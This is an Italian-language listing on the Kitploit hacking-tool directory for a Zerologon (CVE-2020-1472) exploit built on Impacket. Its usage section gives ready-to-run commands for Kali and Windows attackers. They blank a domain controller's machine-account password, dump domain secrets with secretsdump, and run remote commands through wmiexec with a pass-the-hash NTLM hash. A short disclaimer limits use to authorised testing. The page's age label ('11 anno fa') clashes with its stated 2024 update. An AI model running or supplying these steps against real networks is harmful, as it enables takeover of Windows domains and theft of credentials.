Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ZerologonWithImpacket-CVE2020-1472 — Una prova di concetto pratica per CVE-2020-1472 (Zerologon) che utilizza la libreria Impacket per sfruttare la vulnerabilità Netlogon ed eseguire un accesso non autorizzato al controller di dominio. | Kitploit
Strumenti/GitHubGitHub/tuancui22/zerologonwithimpacket-cve2020-1472
Escalation di PrivilegiAttacchi alle PasswordAnalisi delle VulnerabilitàExploitMovimento LateralePost-ExploitPenetration TestingApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
tuancui22/zerologonwithimpacket-cve2020-1472

ZerologonWithImpacket-CVE2020-1472

Una prova di concetto pratica per CVE-2020-1472 (Zerologon) che utilizza la libreria Impacket per sfruttare la vulnerabilità Netlogon ed eseguire un accesso non autorizzato al controller di dominio.

Vedi Repository
11 anno faNon ancora revisionato

Combinazione di Exploit Zerologon e Impacket (CVE-2020-1472)

Questo repository contiene un'implementazione aggiornata (2024) dell'exploit Zerologon combinato con gli strumenti Impacket per sfruttare la CVE-2020-1472 (Zerologon). Questo exploit prende di mira ambienti Windows Server per manipolare le password degli account macchina ed effettuare movimento laterale.

Caratteristiche

  • Sfrutta la CVE-2020-1472 (Zerologon) per impostare la password dell'account macchina del bersaglio su una stringa vuota.
  • Utilizza gli strumenti Impacket per il dump delle credenziali e l'esecuzione di comandi sulla macchina vittima.

Requisiti

  1. Python 3.x
  2. Installare le dipendenze richieste eseguendo:
    root@kitploit:~
    pip install -r requirements.txt
    

Utilizzo

Scenario di esempio

  • Vittima: Windows Server 2016
  • Attaccante: Kali Linux (o sistema Windows)

Comandi di exploit (Kali Linux)

  1. Imposta la password dell'account macchina su una stringa vuota:
    root@kitploit:~
    python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Esegui il dump dei segreti dal Domain Controller:
    root@kitploit:~
    python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
    
  3. Esegui comandi sulla macchina vittima:
    root@kitploit:~
    python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Comandi di exploit (Attaccante Windows)

  1. Imposta la password dell'account macchina su una stringa vuota:
    root@kitploit:~
    python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Esegui il dump dei segreti dal Domain Controller:
    root@kitploit:~
    python secretsdump.py -just-dc "tancongmang/[email protected]"
    
  3. Esegui comandi sulla macchina vittima:
    root@kitploit:~
    python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Note

  • Sostituisci WIN-C9PAHHGJN91 e 192.168.40.145 con il nome host e l'indirizzo IP effettivi del bersaglio.
  • Assicurati di avere la dovuta autorizzazione prima di utilizzare questo strumento.
  • Questo strumento è destinato esclusivamente a scopi educativi e di penetration testing.

Dichiarazione di non responsabilità

Utilizza questo strumento in modo responsabile. L'uso non autorizzato di questo strumento per sfruttare sistemi senza permesso esplicito è illegale e antietico. Gli autori non sono responsabili di qualsiasi uso improprio o danno causato da questo strumento.

Scarica lo strumento